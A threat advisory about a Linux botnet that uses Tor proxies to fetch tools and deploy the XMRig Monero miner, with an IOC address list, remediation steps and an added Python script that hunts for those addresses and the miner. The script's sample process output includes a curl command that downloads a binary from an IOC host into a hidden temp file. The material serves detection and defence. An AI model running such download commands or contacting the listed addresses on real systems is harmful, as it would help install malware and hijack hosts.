Rewterz Threat Alert – Formbook Malware – Active IOCs
April 26, 2021
Rewterz Threat Advisory – Multiple IBM Spectrum Product Vulnerabilities
April 27, 2021
Severity
Medium
Analysis Summary
A recently discovered malware botnet is targeting Linux systems using a combination of techniques that are still uncommon in Linux malware: routing its traffic through Tor proxies, disabling or removing competing malware on the host, and abusing legitimate DevOps tools.
Analysis shows that the botnet fetches the files it needs from the Tor network, including essential binaries such as ps, as, ss, and curl. Because it is built from shell scripts and relies on standard Unix tooling, the malware can issue HTTP requests to collect further information about the infected system.
To carry out the attacks, the threat actors maintain a large network of proxies that bridge the surface web and the Tor network. These proxies also relay identifying information about the target systems, including:
- IP addresses
- Architecture
- Username
- Hostname
- A part of the uniform resource identifier (URI)
The botnet is currently being used for cryptocurrency mining: the XMRig Monero (XMR) miner is deployed onto infected machines. The malware searches the system for running miners, attempts to kill or remove any competitors it finds, and then runs its own mining tools. It needs nothing beyond a Linux operating system to run and spread.
Impact
- Hacking
- Cryptocurrency Mining
Affected Vendors
Linux
Indicators of Compromise
IP
- 144[.]76[.]110[.]70
- 172[.]104[.]56[.]209
- 178[.]128[.]84[.]253
- 185[.]188[.]183[.]254
- 185[.]35[.]223[.]76
- 201[.]159[.]100[.]58
- 209[.]97[.]174[.]97
- 45[.]32[.]171[.]166
- 46[.]101[.]61[.]9
- 46[.]229[.]55[.]38
- 46[.]229[.]55[.]39
- 51[.]103[.]16[.]14
- 51[.]68[.]214[.]156
- 51[.]75[.]163[.]92
- 51[.]89[.]149[.]71
- 67[.]149[.]39[.]182
- 77[.]120[.]123[.]179
- 77[.]66[.]176[.]9
- 82[.]37[.]194[.]181
- 83[.]217[.]28[.]46
- 85[.]159[.]44[.]163
- 85[.]234[.]143[.]106
- 91[.]194[.]250[.]134
- 92[.]63[.]192[.]7
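A quick way to put the IOC list above to work on a Linux host is to refang the addresses and hunt for them in the socket table and process list, alongside the XMRig process name the alert mentions. The script below is an added example, not part of the Rewterz alert or any vendor tool. The `ss -tnp` and `ps -eo pid,user,args` output it parses is constructed sample text that stands in for real command output; the paths and hostnames inside that sample are invented for illustration only.

```python
"""Hunt for the alert's IOCs on a Linux host (added example, not from the alert).

Parses `ss -tnp` text for TCP peers in the IOC list and `ps -eo pid,user,args`
text for the XMRig miner or for an IOC address on a command line. The SAMPLE_*
strings are constructed; hunt_live() runs the real commands instead.
"""
import re
import subprocess
from typing import Dict, List

# IOC list copied from the alert above in its de-fanged form.
DEFANGED_IOCS = [
    "144[.]76[.]110[.]70", "172[.]104[.]56[.]209", "178[.]128[.]84[.]253",
    "185[.]188[.]183[.]254", "185[.]35[.]223[.]76", "201[.]159[.]100[.]58",
    "209[.]97[.]174[.]97", "45[.]32[.]171[.]166", "46[.]101[.]61[.]9",
    "46[.]229[.]55[.]38", "46[.]229[.]55[.]39", "51[.]103[.]16[.]14",
    "51[.]68[.]214[.]156", "51[.]75[.]163[.]92", "51[.]89[.]149[.]71",
    "67[.]149[.]39[.]182", "77[.]120[.]123[.]179", "77[.]66[.]176[.]9",
    "82[.]37[.]194[.]181", "83[.]217[.]28[.]46", "85[.]159[.]44[.]163",
    "85[.]234[.]143[.]106", "91[.]194[.]250[.]134", "92[.]63[.]192[.]7",
]


def refang(ioc: str) -> str:
    """Turn the de-fanged notation 1[.]2[.]3[.]4 back into a routable address."""
    return ioc.replace("[.]", ".")


IOC_IPS = frozenset(refang(i) for i in DEFANGED_IOCS)

# Miner named in the alert; matched case-insensitively against argv.
MINER_NAMES = ("xmrig",)
IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def peer_ip(peer_field: str) -> str:
    """'144.76.110.70:443' -> '144.76.110.70'; '[::1]:22' -> '::1'."""
    host, _, _port = peer_field.rpartition(":")
    return host.strip("[]")


def find_ioc_connections(ss_output: str) -> List[Dict[str, str]]:
    """Return `ss -tnp` rows whose peer address is on the IOC list."""
    hits = []
    for line in ss_output.splitlines():
        fields = line.split()
        # Skip the header row and anything too short to carry a peer column.
        if len(fields) < 5 or fields[0] == "State":
            continue
        ip = peer_ip(fields[4])
        if ip in IOC_IPS:
            process = fields[5] if len(fields) > 5 else ""
            hits.append({"peer": ip, "state": fields[0], "process": process})
    return hits


def find_suspicious_processes(ps_output: str) -> List[Dict[str, str]]:
    """Return `ps -eo pid,user,args` rows naming the miner or an IOC address."""
    hits = []
    for line in ps_output.splitlines():
        parts = line.split(None, 2)  # pid, user, then the full command line
        if len(parts) < 3 or parts[0] == "PID":
            continue
        pid, user, args = parts
        reasons = []
        if any(name in args.lower() for name in MINER_NAMES):
            reasons.append("miner binary on command line")
        ioc_args = [ip for ip in IPV4_RE.findall(args) if ip in IOC_IPS]
        if ioc_args:
            reasons.append("IOC address in arguments: " + ", ".join(ioc_args))
        if reasons:
            hits.append({"pid": pid, "user": user, "args": args,
                         "reason": "; ".join(reasons)})
    return hits


def hunt_live() -> Dict[str, list]:
    """Run the real commands on this host (Linux only) and scan their output."""
    ss = subprocess.run(["ss", "-tnp"], capture_output=True, text=True, check=False).stdout
    ps = subprocess.run(["ps", "-eo", "pid,user,args"], capture_output=True,
                        text=True, check=False).stdout
    return {"connections": find_ioc_connections(ss),
            "processes": find_suspicious_processes(ps)}


# Constructed sample output, not captured from a real infection.
SAMPLE_SS = """\
State  Recv-Q Send-Q Local Address:Port  Peer Address:Port    Process
ESTAB  0      0      10.0.0.5:22         10.0.0.9:51022       users:(("sshd",pid=812,fd=4))
ESTAB  0      0      10.0.0.5:41618      144.76.110.70:443    users:(("curl",pid=4242,fd=3))
ESTAB  0      0      [::1]:5432          [::1]:40110          users:(("postgres",pid=990,fd=9))
"""

SAMPLE_PS = """\
  PID USER     COMMAND
    1 root     /sbin/init
 4242 www-data curl -s http://46.229.55.38/dl/ss -o /tmp/.ss
 4301 www-data /tmp/.x/xmrig -c /tmp/.x/config.json
  990 postgres /usr/lib/postgresql/13/bin/postgres
"""

if __name__ == "__main__":
    for hit in find_ioc_connections(SAMPLE_SS) + find_suspicious_processes(SAMPLE_PS):
        print(hit)
```

Because the alert notes that the botnet ships its own copies of ps, ss and curl, treat the host's command output with some suspicion during a live hunt: run `hunt_live()` with known-good static binaries on the PATH, or cross-check against /proc/net/tcp and /proc/*/cmdline, and pair the host view with firewall or NetFlow logs for the same IOC addresses.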
Remediation
- Use strong, unique passwords and key-based authentication for SSH and other remote access.
- Apply the latest security patches regularly.
- Restrict system access to authorized personnel only, and block the listed IP addresses at the network perimeter.